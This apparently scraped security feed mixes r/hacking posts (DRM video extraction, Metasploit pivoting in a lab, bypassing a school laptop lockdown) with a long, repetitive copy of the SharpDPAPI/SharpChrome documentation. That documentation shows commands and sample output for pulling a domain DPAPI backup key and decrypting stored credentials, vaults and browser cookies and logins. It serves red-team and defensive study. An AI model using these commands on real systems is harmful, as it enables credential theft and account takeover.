hacking: security in practice
DRM Video Downloading
Hi I have purchased a course which is a limited period and is going to end soon but due to corona i did not get that ample amount of time to learn and make notes. So i want to download it and complete the course later after the time period ends.
Its an Android App + website too
I can download the vidoes on app but the videos are visible only in the app and cant find it in my file manger dont know where it goes. But in the setting App's data is using the space. So is there any way to get it in external storage ?
P.s: i solely respect the amount of tutor making course but i am really in need. The download videos do fash my contact no. And other login details in between the video. And i have no problem with it
And i want to use it for my personal use. Please help.
English is not my first language and i am not a techy geek or something so i am not able to descibe much, you can ask in comments if i have left any information
submitted by /u/notagoodguy7
[link] [comments]
DRM Video Downloading
Hi I have purchased a course which is a limited period and is going to end soon but due to corona i did not get that ample amount of time to learn and make notes. So i want to download it and complete the course later after the time period ends.
Its an Android App + website too
I can download the vidoes on app but the videos are visible only in the app and cant find it in my file manger dont know where it goes. But in the setting App's data is using the space. So is there any way to get it in external storage ?
P.s: i solely respect the amount of tutor making course but i am really in need. The download videos do fash my contact no. And other login details in between the video. And i have no problem with it
And i want to use it for my personal use. Please help.
English is not my first language and i am not a techy geek or something so i am not able to descibe much, you can ask in comments if i have left any information
submitted by /u/notagoodguy7
[link] [comments]
reddit
DRM Video Downloading
Hi I have purchased a course which is a limited period and is going to end soon but due to corona i did not get that ample amount of time to learn...
hacking: security in practice
Xmzx hidden in json
I have a file that has the extension. I believe within it is hidden a .xmzx which I'm trying to extract a decrypt. Is there any advice as to how one could go about doing this?
submitted by /u/Saitama606
[link] [comments]
Xmzx hidden in json
I have a file that has the extension. I believe within it is hidden a .xmzx which I'm trying to extract a decrypt. Is there any advice as to how one could go about doing this?
submitted by /u/Saitama606
[link] [comments]
reddit
Xmzx hidden in json
I have a file that has the extension. I believe within it is hidden a .xmzx which I'm trying to extract a decrypt. Is there any advice as to how...
hacking: security in practice
Exfiltrate files using the DNS
submitted by /u/CrankyBear
[link] [comments]
Exfiltrate files using the DNS
submitted by /u/CrankyBear
[link] [comments]
reddit
r/hacking - Exfiltrate files using the DNS
0 votes and 0 comments so far on Reddit
https://b.thumbs.redditmedia.com/NqUpgvSF4veSJwQnopaW4-9YFRJzLQIIrH46ApBKT5Q.jpg Hi, i am doing a penetration lab of INE, and i am stuck trying to figure out how the autoroute module of metasploit (/usr/share/metasploit-framework/modules/post/multi/manage) works;
172.16.37.234 is a webserver where i am using a reverse shell and the webserver has another interface where the address is 172.16.50.224(which i cannot reach because is in another subnet)
https://preview.redd.it/xhq0d78oelq61.png?width=871&format=png&auto=webp&s=8cb252501d8191ff523ddd5336ecb498e59e017e
So basically the guide is telling me to run this magical module of metasploit and i will get access to the 172.16.50.22, but i don't understand what is doing, i tried to do ssh tunneling,, without success, however if i just follow the steps now i will finally be able to reach the 172.16.50.22 machine but i really want to know how it works and why it works
https://preview.redd.it/jyjde0maelq61.png?width=857&format=png&auto=webp&s=7798a3eea6f633b953a96ffdd2f2dafcb2623714
Anyone wanna help me with this?
If you need extra information in order to understand the situation, i will be happy to provide it because this part of the lab is killing me
submitted by /u/Alexis201249
[link] [comments]
172.16.37.234 is a webserver where i am using a reverse shell and the webserver has another interface where the address is 172.16.50.224(which i cannot reach because is in another subnet)
https://preview.redd.it/xhq0d78oelq61.png?width=871&format=png&auto=webp&s=8cb252501d8191ff523ddd5336ecb498e59e017e
So basically the guide is telling me to run this magical module of metasploit and i will get access to the 172.16.50.22, but i don't understand what is doing, i tried to do ssh tunneling,, without success, however if i just follow the steps now i will finally be able to reach the 172.16.50.22 machine but i really want to know how it works and why it works
https://preview.redd.it/jyjde0maelq61.png?width=857&format=png&auto=webp&s=7798a3eea6f633b953a96ffdd2f2dafcb2623714
Anyone wanna help me with this?
If you need extra information in order to understand the situation, i will be happy to provide it because this part of the lab is killing me
submitted by /u/Alexis201249
[link] [comments]
hacking: security in practice
laptop I dont know what to do anymore
So I Go to a school were we pay for the MacBooks and they lock them down. last year it was fine last year but this year I can't even watch YouTube or play any sort of game/download the tings I want. application downloads require admin's user and pass. onto of that I've tried trying to use terminal to force my self admin even though I broke through to be able to access terminal I wasn't able to use the code because it instantly rejected it. on my Mac the use an application called Iboss and a network blocking through wifi. it blocks everything even off of school wifi. I just wanna be able to use my Mac and do the things I want but I can't so if you are interested please respond!!!!
submitted by /u/deltax64
[link] [comments]
laptop I dont know what to do anymore
So I Go to a school were we pay for the MacBooks and they lock them down. last year it was fine last year but this year I can't even watch YouTube or play any sort of game/download the tings I want. application downloads require admin's user and pass. onto of that I've tried trying to use terminal to force my self admin even though I broke through to be able to access terminal I wasn't able to use the code because it instantly rejected it. on my Mac the use an application called Iboss and a network blocking through wifi. it blocks everything even off of school wifi. I just wanna be able to use my Mac and do the things I want but I can't so if you are interested please respond!!!!
submitted by /u/deltax64
[link] [comments]
reddit
laptop I dont know what to do anymore
So I Go to a school were we pay for the MacBooks and they lock them down. last year it was fine last year but this year I can't even watch YouTube...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
NIST Publishes Guide for Securing Hotel Property Management Systems
These sensitive systems store guests' personal data and payment-card information.
NIST Publishes Guide for Securing Hotel Property Management Systems
These sensitive systems store guests' personal data and payment-card information.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Kansas Man Indicted for Hacking, Tampering With Water Utility System
Attacker disabled water-purification operation systems "with intention of harming" the rural water district.
Kansas Man Indicted for Hacking, Tampering With Water Utility System
Attacker disabled water-purification operation systems "with intention of harming" the rural water district.
SharpDPAPI - A C# Port Of Some Mimikatz DPAPI Functionality
http://www.kitploit.com/2021/04/sharpdpapi-c-port-of-some-mimikatz.html
http://www.kitploit.com/2021/04/sharpdpapi-c-port-of-some-mimikatz.html
SharpDPAPI (https://github.com/GhostPack/SharpDPAPI#sharpdpapi-1) is a C# port of some DPAPI functionality from @gentilkiwi (https://twitter.com/gentilkiwi)'s Mimikatz (https://github.com/gentilkiwi/mimikatz/) project.I did not come up with this logic, it is simply a port from Mimikatz in order to better understand the process and operationalize it to fit our workflow. The SharpChrome (https://github.com/GhostPack/SharpDPAPI#sharpchrome) subproject is an adaptation of work from @gentilkiwi (https://twitter.com/gentilkiwi) and @djhohnstein (https://twitter.com/djhohnstein), specifically his SharpChrome project (https://github.com/djhohnstein/SharpChrome/). However, this version of SharpChrome uses a different version of the C# SQL library (https://github.com/akveo/digitsquare/tree/a251a1220ef6212d1bed8c720368435ee1bfdfc2/plugins/com.brodysoft.sqlitePlugin/src/wp) that supports lockless opening (https://github.com/gentilkiwi/mimikatz/pull/199). SharpChrome is built as a separate project in SharpDPAPI because of the size of the SQLite library utilized. Both Chrome and newer Chromium-based Edge browsers can be triaged with SharpChrome. SharpChrome also uses an minimized version of @AArnott's BCrypt P/Invoke code (https://github.com/AArnott/pinvoke/tree/master/src/BCrypt) released under the MIT License. If you're unfamiliar with DPAPI, check out this post (https://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/) for more background information. For more information on Credentials (https://www.kitploit.com/search/label/Credentials) and Vaults in regards to DPAPI, check out Benjamin's wiki entry on the subject. (https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials) @harmj0y (https://twitter.com/harmj0y) is the primary author of this port. SharpDPAPI is licensed under the BSD 3-Clause license.
Background
SharpDPAPI Command Line Usage
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.11.0
Retrieve a domain controller's DPAPI backup key, optionally specifying a DC and output file:
SharpDPAPI backupkey [/nowrap] [/server:SERVER.domain] [/file:key.pvk]
The *search* comand will search for potential DPAPI blobs in the registry, files, folders, and base64 blobs:
search /type:registry [/path:HKLM\path\to\key] [/showErrors]
search /type:folder /path:C:\path\to\folder [/maxBytes:] [/showErrors]
search /type:file /path:C:\path\to\file [/maxBytes:]
search /type:base64 [/base:]
Machine/SYSTEM Triage:
machinemasterkeys - triage all reachable machine masterkey files (elevates to SYSTEM to retrieve the DPAPI_SYSTEM LSA secret)
machinecre dentials - use 'machinemasterkeys' and then triage machine Credential files
machinevaults - use 'machinemasterkeys' and then triage machine Vaults
machinetriage - run the 'machinecredentials' and 'machinevaults' commands
User Triage:
Arguments for the 'masterkeys' command:
/target:FILE/folder - triage a specific masterkey, or a folder full of masterkeys (otherwise triage local masterkeys)
/pvk:BASE64... - use a base64'ed DPAPI domain private key file to first decrypt reachable user masterkeys
/pvk:key.pvk - use a DPAPI domain private key file to first decrypt reachable user masterkeys
/password:X - first decrypt the current user's masterkeys using a plaintext password (works remotely)
/server:SERVER - triage a remote server, assuming admin access
Arguments for the credential s|vaults|rdg|keepass|triage|blob|ps commands:
Decryption:
/unprotect - force use of CryptUnprotectData() for 'ps', 'rdg', or 'blob' commands
Background
SharpDPAPI Command Line Usage
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.11.0
Retrieve a domain controller's DPAPI backup key, optionally specifying a DC and output file:
SharpDPAPI backupkey [/nowrap] [/server:SERVER.domain] [/file:key.pvk]
The *search* comand will search for potential DPAPI blobs in the registry, files, folders, and base64 blobs:
search /type:registry [/path:HKLM\path\to\key] [/showErrors]
search /type:folder /path:C:\path\to\folder [/maxBytes:] [/showErrors]
search /type:file /path:C:\path\to\file [/maxBytes:]
search /type:base64 [/base:]
Machine/SYSTEM Triage:
machinemasterkeys - triage all reachable machine masterkey files (elevates to SYSTEM to retrieve the DPAPI_SYSTEM LSA secret)
machinecre dentials - use 'machinemasterkeys' and then triage machine Credential files
machinevaults - use 'machinemasterkeys' and then triage machine Vaults
machinetriage - run the 'machinecredentials' and 'machinevaults' commands
User Triage:
Arguments for the 'masterkeys' command:
/target:FILE/folder - triage a specific masterkey, or a folder full of masterkeys (otherwise triage local masterkeys)
/pvk:BASE64... - use a base64'ed DPAPI domain private key file to first decrypt reachable user masterkeys
/pvk:key.pvk - use a DPAPI domain private key file to first decrypt reachable user masterkeys
/password:X - first decrypt the current user's masterkeys using a plaintext password (works remotely)
/server:SERVER - triage a remote server, assuming admin access
Arguments for the credential s|vaults|rdg|keepass|triage|blob|ps commands:
Decryption:
/unprotect - force use of CryptUnprotectData() for 'ps', 'rdg', or 'blob' commands
/password:X - first decrypt the current user's masterkeys using a plaintext password. Works with any function, as well as remotely.
GUID1:SHA1 ... - use a one or more GUID:SHA1 masterkeys for decryption
/mkfile:FILE - use a file of one or more GUID:SHA1 masterkeys for decryption
/pvk:BASE64... - use a base64'ed DPAPI domain private key file to first decrypt reachable user masterkeys
/pvk:key.pvk - use a DPAPI domain private key file to first decrypt reachable user masterkeys
Targeting:
/target:FILE/folder - triage a specific 'Credentials','.rdg|RDCMan.settings', 'blob', or 'ps' file location, or 'Vault' folder
/server:SERVER - triage a remote server, assuming admin access
Note: must use with /pvk:KEY or /password:X
Note: not applicable to 'blob' or 'ps' commands
Certificate Triage:
Arguments for the 'certificates' command:
/showall - show all decrypted private key files, not just ones that are linked to installed certs (the default)
/machine - use the local machine store for certificate triage
/mkfile | /target - for /machine triage
/pvk | /mkfile | /password | /server | /target - for user triage
Note: in most cases, just use *triage* if you're targeting user DPAPI secrets and *machinetriage* if you're going after SYSTEM DPAPI secrets.
These functions wrap all the other applicable functions that can be automatic ally run.
SharpChrome Command Line Usage
__ _
(_ |_ _. ._ ._ / |_ ._ _ ._ _ _
__) | | (_| | |_) \_ | | | (_) | | | (/_
|
v1.9.0
Retrieve a domain controller's DPAPI backup key, optionally specifying a DC and output file:
SharpChrome backupkey [/nowrap] [/server:SERVER.domain] [/file:key.pvk]
Global arguments for the 'cookies', 'logins', and 'statekeys' commands:
Decryption:
/unprotect - force use of CryptUnprotectData() (default for unprivileged execution)
/password:X - first decrypt the current user's masterkeys using a plaintext password. Works with any function, as well as remotely.
GUID1:SHA1 ... - use a one or more GUID:SHA1 masterkeys for decryption
/mkfile:FILE - use a file of one or more GUID:SHA1 masterkeys for decryption
/pvk:BASE64... - use a base64'ed DPAPI domain private key file to f irst decrypt reachable user masterkeys
/pvk:key.pvk - use a DPAPI domain private key file to first decrypt reachable user masterkeys
/statekey:X - a decrypted AES state key (from the 'statekeys' command)
Targeting:
/target:FILE - triage a specific 'Cookies', 'Login Data', or 'Local State' file location
/target:C:\Users\X\ - triage a specific user folder for any specified command
/server:SERVER - triage a remote server, assuming admin access (note: must use with /pvk:KEY)
/browser:X - triage 'chrome' (the default) or (chromium-based) 'edge'
Output:
/format:X - either 'csv' (default) or 'table' display
/showall - show Login Data entries with null passwords and expired Cookies instead of filtering (default)
/consoleoutfile:X - output all console output to a file on disk
'cookies' command specific arguments:
/cookie:"REGEX" - only return cookies where the cookie name matches the supplied regex
/url:"REGEX" - only return cookies where the cookie URL matches the supplied regex
/format:json - output cookie values in an EditThisCookie JSON import format. Best when used with a regex!
GUID1:SHA1 ... - use a one or more GUID:SHA1 masterkeys for decryption
/mkfile:FILE - use a file of one or more GUID:SHA1 masterkeys for decryption
/pvk:BASE64... - use a base64'ed DPAPI domain private key file to first decrypt reachable user masterkeys
/pvk:key.pvk - use a DPAPI domain private key file to first decrypt reachable user masterkeys
Targeting:
/target:FILE/folder - triage a specific 'Credentials','.rdg|RDCMan.settings', 'blob', or 'ps' file location, or 'Vault' folder
/server:SERVER - triage a remote server, assuming admin access
Note: must use with /pvk:KEY or /password:X
Note: not applicable to 'blob' or 'ps' commands
Certificate Triage:
Arguments for the 'certificates' command:
/showall - show all decrypted private key files, not just ones that are linked to installed certs (the default)
/machine - use the local machine store for certificate triage
/mkfile | /target - for /machine triage
/pvk | /mkfile | /password | /server | /target - for user triage
Note: in most cases, just use *triage* if you're targeting user DPAPI secrets and *machinetriage* if you're going after SYSTEM DPAPI secrets.
These functions wrap all the other applicable functions that can be automatic ally run.
SharpChrome Command Line Usage
__ _
(_ |_ _. ._ ._ / |_ ._ _ ._ _ _
__) | | (_| | |_) \_ | | | (_) | | | (/_
|
v1.9.0
Retrieve a domain controller's DPAPI backup key, optionally specifying a DC and output file:
SharpChrome backupkey [/nowrap] [/server:SERVER.domain] [/file:key.pvk]
Global arguments for the 'cookies', 'logins', and 'statekeys' commands:
Decryption:
/unprotect - force use of CryptUnprotectData() (default for unprivileged execution)
/password:X - first decrypt the current user's masterkeys using a plaintext password. Works with any function, as well as remotely.
GUID1:SHA1 ... - use a one or more GUID:SHA1 masterkeys for decryption
/mkfile:FILE - use a file of one or more GUID:SHA1 masterkeys for decryption
/pvk:BASE64... - use a base64'ed DPAPI domain private key file to f irst decrypt reachable user masterkeys
/pvk:key.pvk - use a DPAPI domain private key file to first decrypt reachable user masterkeys
/statekey:X - a decrypted AES state key (from the 'statekeys' command)
Targeting:
/target:FILE - triage a specific 'Cookies', 'Login Data', or 'Local State' file location
/target:C:\Users\X\ - triage a specific user folder for any specified command
/server:SERVER - triage a remote server, assuming admin access (note: must use with /pvk:KEY)
/browser:X - triage 'chrome' (the default) or (chromium-based) 'edge'
Output:
/format:X - either 'csv' (default) or 'table' display
/showall - show Login Data entries with null passwords and expired Cookies instead of filtering (default)
/consoleoutfile:X - output all console output to a file on disk
'cookies' command specific arguments:
/cookie:"REGEX" - only return cookies where the cookie name matches the supplied regex
/url:"REGEX" - only return cookies where the cookie URL matches the supplied regex
/format:json - output cookie values in an EditThisCookie JSON import format. Best when used with a regex!
SharpDPAPI Commands
User Triage
masterkeys
The masterkeys command will search for any readable user masterkey files and decrypt them using a supplied domain DPAPI backup key. It will return a set of masterkey {GUID}:SHA1 mappings. The domain backup key can be in base64 form (/pvk:BASE64...) or file form (/pvk:key.pvk). C:\Temp>SharpDPAPI.exe masterkeys /pvk:key.pvk
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.2.0
[*] Action: Triage User Masterkey Files
[*] Found MasterKey : C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1473254003-2681465353-4059813368-1000\28678d89-678a-404f-a197-f4186315c4fa
[*] Found MasterKey : C:\Users\harmj0y\AppData\Roaming\Microsoft\Protect\S-1-5-21-883232822-274137685-4173207997-1111\3858b304-37e5-48aa-afa2-87aced61921a
...(snip)...
[*] User master key cache:
{42e95117-ff5f-40fa-a6fc-87584758a479}:4C802894C566B235B7F34B011316...(snip)...
...(snip)...
credentials
The credentials command will search for Credential files and either a) decrypt them with any "{GUID}:SHA1" masterkeys passed, b) a /mkfile:FILE of one or more {GUID}:SHA1 masterkey mappings, c) use a supplied DPAPI domain backup key (/pvk:BASE64... or /pvk:key.pvk) to first decrypt any user masterkeys (a la masterkeys), or d) a /password:X to decrypt any user masterkeys, which are then used as a lookup decryption table. DPAPI GUID mappings can be recovered with Mimikatz' sekurlsa::dpapi command. A specific credential file (or folder of credentials) can be specified with /target:FILE or /target:C:\Folder\. If a file is specified, {GUID}:SHA1 values are required, and if a folder is specified either a) {GUID}:SHA1 values must be supplied or b) the folder must contain DPAPI masterkeys and a /pvk domain backup key must be supplied. If run from an elevated context, Credential files for ALL users will be triaged, otherwise only Credential files for the current user will be processed. Using domain {GUID}:SHA1 masterkey mappings: C:\Temp>SharpDPAPI.exe credentials {44ca9f3a-9097-455e-94d0-d91de951c097}:9b049ce6918ab89937687...(snip)... {feef7b25-51d6-4e14-a52f-eb2a387cd0f3}:f9bc09dad3bc2cd00efd903...(snip)...
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.2.0
[*] Action: User DPAPI Credential Triage
[*] Triaging Credentials for ALL users
Folder : C:\Users\harmj0y\AppData\Local\Microsoft\Credentials\
CredFile : 48C08A704ADBA03A93CD7EC5B77C0EAB
guidMasterKey : {885342c6-028b-4ecf-82b2-304242e769e0}
size : 436
flags : 0x20000000 (CRYPTPROTECT_SYSTEM)
algHash/algCrypt : 32772/26115
description : Local Credential Data
LastWritten : 1/22/2019 2:44:40 AM
TargetName : Domain:target=TERMSRV/10.4.10.101
TargetAlia s :
Comment :
UserName : DOMAIN\user
Credential : Password!
...(snip)...
Using a domain DPAPI backup key to first decrypt any discoverable masterkeys: C:\Temp>SharpDPAPI.exe credentials /pvk:HvG1sAAAAAABAAAAAAAAAAAAAAC...(snip)...
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.2.0
[*] Action: User DPAPI Credential Triage
[*] Using a domain DPAPI backup key to triage masterkeys for decryption key mappings!
[*] User master key cache:
{42e95117-ff5f-40fa-a6fc-87584758a479}:4C802894C566B235B7F34B011316E94CC4CE4665
...(snip)...
[*] Triaging Credentials for ALL users
Folder : C:\Users\harmj0y\AppData\Local\Microsoft\Credentials\
CredFile : 48C08A704ADBA03A93CD7EC5B77C0EAB
guidMasterKey : {885342c6-028b-4ecf-82b2-304242e769e0}
size : 436
flags : 0x20000000 (CRYPTPROTECT_SYSTEM)
algHash/algCrypt : 32772/26115
User Triage
masterkeys
The masterkeys command will search for any readable user masterkey files and decrypt them using a supplied domain DPAPI backup key. It will return a set of masterkey {GUID}:SHA1 mappings. The domain backup key can be in base64 form (/pvk:BASE64...) or file form (/pvk:key.pvk). C:\Temp>SharpDPAPI.exe masterkeys /pvk:key.pvk
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.2.0
[*] Action: Triage User Masterkey Files
[*] Found MasterKey : C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1473254003-2681465353-4059813368-1000\28678d89-678a-404f-a197-f4186315c4fa
[*] Found MasterKey : C:\Users\harmj0y\AppData\Roaming\Microsoft\Protect\S-1-5-21-883232822-274137685-4173207997-1111\3858b304-37e5-48aa-afa2-87aced61921a
...(snip)...
[*] User master key cache:
{42e95117-ff5f-40fa-a6fc-87584758a479}:4C802894C566B235B7F34B011316...(snip)...
...(snip)...
credentials
The credentials command will search for Credential files and either a) decrypt them with any "{GUID}:SHA1" masterkeys passed, b) a /mkfile:FILE of one or more {GUID}:SHA1 masterkey mappings, c) use a supplied DPAPI domain backup key (/pvk:BASE64... or /pvk:key.pvk) to first decrypt any user masterkeys (a la masterkeys), or d) a /password:X to decrypt any user masterkeys, which are then used as a lookup decryption table. DPAPI GUID mappings can be recovered with Mimikatz' sekurlsa::dpapi command. A specific credential file (or folder of credentials) can be specified with /target:FILE or /target:C:\Folder\. If a file is specified, {GUID}:SHA1 values are required, and if a folder is specified either a) {GUID}:SHA1 values must be supplied or b) the folder must contain DPAPI masterkeys and a /pvk domain backup key must be supplied. If run from an elevated context, Credential files for ALL users will be triaged, otherwise only Credential files for the current user will be processed. Using domain {GUID}:SHA1 masterkey mappings: C:\Temp>SharpDPAPI.exe credentials {44ca9f3a-9097-455e-94d0-d91de951c097}:9b049ce6918ab89937687...(snip)... {feef7b25-51d6-4e14-a52f-eb2a387cd0f3}:f9bc09dad3bc2cd00efd903...(snip)...
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.2.0
[*] Action: User DPAPI Credential Triage
[*] Triaging Credentials for ALL users
Folder : C:\Users\harmj0y\AppData\Local\Microsoft\Credentials\
CredFile : 48C08A704ADBA03A93CD7EC5B77C0EAB
guidMasterKey : {885342c6-028b-4ecf-82b2-304242e769e0}
size : 436
flags : 0x20000000 (CRYPTPROTECT_SYSTEM)
algHash/algCrypt : 32772/26115
description : Local Credential Data
LastWritten : 1/22/2019 2:44:40 AM
TargetName : Domain:target=TERMSRV/10.4.10.101
TargetAlia s :
Comment :
UserName : DOMAIN\user
Credential : Password!
...(snip)...
Using a domain DPAPI backup key to first decrypt any discoverable masterkeys: C:\Temp>SharpDPAPI.exe credentials /pvk:HvG1sAAAAAABAAAAAAAAAAAAAAC...(snip)...
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.2.0
[*] Action: User DPAPI Credential Triage
[*] Using a domain DPAPI backup key to triage masterkeys for decryption key mappings!
[*] User master key cache:
{42e95117-ff5f-40fa-a6fc-87584758a479}:4C802894C566B235B7F34B011316E94CC4CE4665
...(snip)...
[*] Triaging Credentials for ALL users
Folder : C:\Users\harmj0y\AppData\Local\Microsoft\Credentials\
CredFile : 48C08A704ADBA03A93CD7EC5B77C0EAB
guidMasterKey : {885342c6-028b-4ecf-82b2-304242e769e0}
size : 436
flags : 0x20000000 (CRYPTPROTECT_SYSTEM)
algHash/algCrypt : 32772/26115
description : Local Credential Dat a
LastWritten : 1/22/2019 2:44:40 AM
TargetName : Domain:target=TERMSRV/10.4.10.101
TargetAlias :
Comment :
UserName : DOMAIN\user
Credential : Password!
...(snip)...
vaults
The vaults command will search for Vaults and either a) decrypt them with any "{GUID}:SHA1" masterkeys passed, b) a /mkfile:FILE of one or more {GUID}:SHA1 masterkey mappings, c) use a supplied DPAPI domain backup key (/pvk:BASE64... or /pvk:key.pvk) to first decrypt any user masterkeys (a la masterkeys), or d) a /password:X to decrypt any user masterkeys, which are then used as a lookup decryption table. DPAPI GUID mappings can be recovered with Mimikatz' sekurlsa::dpapi command. The Policy.vpol folder in the Vault folder is decrypted with any supplied DPAPI keys to retrieve the associated AES decryption keys, which are then used to decrypt any associated .vcrd files. A specific vault folder can be specified with /target:C:\Folder\. In this case, either a) {GUID}:SHA1 values must be supplied or b) the folder must contain DPAPI masterkeys and a /pvk domain backup key must be supplied. Using domain {GUID}:SHA1 masterkey mappings: C:\Temp>SharpDPAPI.exe vaults {44ca9f3a-9097-455e-94d0-d91de951c097}:9b049ce6918ab89937687...(snip)... {feef7b25-51d6-4e14-a52f-eb2a387cd0f3}:f9bc09dad3bc2cd00efd903...(snip)...
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.2.0
[*] Action: User DPAPI Vault Triage
[*] Triaging Vaults for ALL users
[*] Triaging Vault folder: C:\Users\harmj0y\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28
VaultID : 4bf4c442-9b8a-41a0-b380-dd4a704ddb28
Name : Web Credentials
guidMasterKey : {feef7b25-51d6-4e14-a52f-eb2a387cd0f3}
size : 240
flags : 0x20000000 (CRYPTPROTECT_SYSTEM)
algHash/algCrypt : 32772/26115
description :
aes128 key : EDB42294C0721F2F1638A40F0CD67CD8
aes256 key : 84C D64B5F438B8B9DA15238A5CFA418C04F9BED6B4B4CCAC9705C36C65B5E793
LastWritten : 10/12/2018 12:10:42 PM
FriendlyName : Internet Explorer
Identity : admin
Resource : https://10.0.0.1/
Authenticator : Password!
...(snip)...
Using a domain DPAPI backup key to first decrypt any discoverable masterkeys: C:\Temp>SharpDPAPI.exe credentials /pvk:HvG1sAAAAAABAAAAAAAAAAAAAAC...(snip)...
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.2.0
[*] Action: DPAPI Vault Triage
[*] Using a domain DPAPI backup key to triage masterkeys for decryption key mappings!
[*] User master key cache:
{42e95117-ff5f-40fa-a6fc-87584758a479}:4C802894C566B235B7F34B011316E94CC4CE4665
...(snip)...
[*] Triaging Vaults for ALL users
[*] Triaging Vault folder: C:\Users\harmj0y\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28
VaultID : 4bf4c442-9b8a-41a0-b380-dd4a704ddb28
Name : Web Credentials
guidMasterKey : {feef7b25-51d6-4e14-a52f-eb2a387cd0f3}
size : 240
flags : 0x20000000 (CRYPTPROTECT_SYSTEM)
algHash/algCry pt : 32772/26115
description :
aes128 key : EDB42294C0721F2F1638A40F0CD67CD8
aes256 key : 84CD64B5F438B8B9DA15238A5CFA418C04F9BED6B4B4CCAC9705C36C65B5E793
LastWritten : 10/12/2018 12:10:42 PM
FriendlyName : Internet Explorer
Identity : admin
Resource : https://10.0.0.1/
Authenticator : Password!
...(snip)...
Using a domain DPAPI backup key with a folder specified (i.e. "offline" triage): C:\Temp>SharpDPAPI.exe vaults /target:C:\Temp\test\ /pvk:HvG1sAAAAAABAAAAAAAAAAAAAAC...(snip)...
__ _ _ _ ___
LastWritten : 1/22/2019 2:44:40 AM
TargetName : Domain:target=TERMSRV/10.4.10.101
TargetAlias :
Comment :
UserName : DOMAIN\user
Credential : Password!
...(snip)...
vaults
The vaults command will search for Vaults and either a) decrypt them with any "{GUID}:SHA1" masterkeys passed, b) a /mkfile:FILE of one or more {GUID}:SHA1 masterkey mappings, c) use a supplied DPAPI domain backup key (/pvk:BASE64... or /pvk:key.pvk) to first decrypt any user masterkeys (a la masterkeys), or d) a /password:X to decrypt any user masterkeys, which are then used as a lookup decryption table. DPAPI GUID mappings can be recovered with Mimikatz' sekurlsa::dpapi command. The Policy.vpol folder in the Vault folder is decrypted with any supplied DPAPI keys to retrieve the associated AES decryption keys, which are then used to decrypt any associated .vcrd files. A specific vault folder can be specified with /target:C:\Folder\. In this case, either a) {GUID}:SHA1 values must be supplied or b) the folder must contain DPAPI masterkeys and a /pvk domain backup key must be supplied. Using domain {GUID}:SHA1 masterkey mappings: C:\Temp>SharpDPAPI.exe vaults {44ca9f3a-9097-455e-94d0-d91de951c097}:9b049ce6918ab89937687...(snip)... {feef7b25-51d6-4e14-a52f-eb2a387cd0f3}:f9bc09dad3bc2cd00efd903...(snip)...
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.2.0
[*] Action: User DPAPI Vault Triage
[*] Triaging Vaults for ALL users
[*] Triaging Vault folder: C:\Users\harmj0y\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28
VaultID : 4bf4c442-9b8a-41a0-b380-dd4a704ddb28
Name : Web Credentials
guidMasterKey : {feef7b25-51d6-4e14-a52f-eb2a387cd0f3}
size : 240
flags : 0x20000000 (CRYPTPROTECT_SYSTEM)
algHash/algCrypt : 32772/26115
description :
aes128 key : EDB42294C0721F2F1638A40F0CD67CD8
aes256 key : 84C D64B5F438B8B9DA15238A5CFA418C04F9BED6B4B4CCAC9705C36C65B5E793
LastWritten : 10/12/2018 12:10:42 PM
FriendlyName : Internet Explorer
Identity : admin
Resource : https://10.0.0.1/
Authenticator : Password!
...(snip)...
Using a domain DPAPI backup key to first decrypt any discoverable masterkeys: C:\Temp>SharpDPAPI.exe credentials /pvk:HvG1sAAAAAABAAAAAAAAAAAAAAC...(snip)...
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.2.0
[*] Action: DPAPI Vault Triage
[*] Using a domain DPAPI backup key to triage masterkeys for decryption key mappings!
[*] User master key cache:
{42e95117-ff5f-40fa-a6fc-87584758a479}:4C802894C566B235B7F34B011316E94CC4CE4665
...(snip)...
[*] Triaging Vaults for ALL users
[*] Triaging Vault folder: C:\Users\harmj0y\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28
VaultID : 4bf4c442-9b8a-41a0-b380-dd4a704ddb28
Name : Web Credentials
guidMasterKey : {feef7b25-51d6-4e14-a52f-eb2a387cd0f3}
size : 240
flags : 0x20000000 (CRYPTPROTECT_SYSTEM)
algHash/algCry pt : 32772/26115
description :
aes128 key : EDB42294C0721F2F1638A40F0CD67CD8
aes256 key : 84CD64B5F438B8B9DA15238A5CFA418C04F9BED6B4B4CCAC9705C36C65B5E793
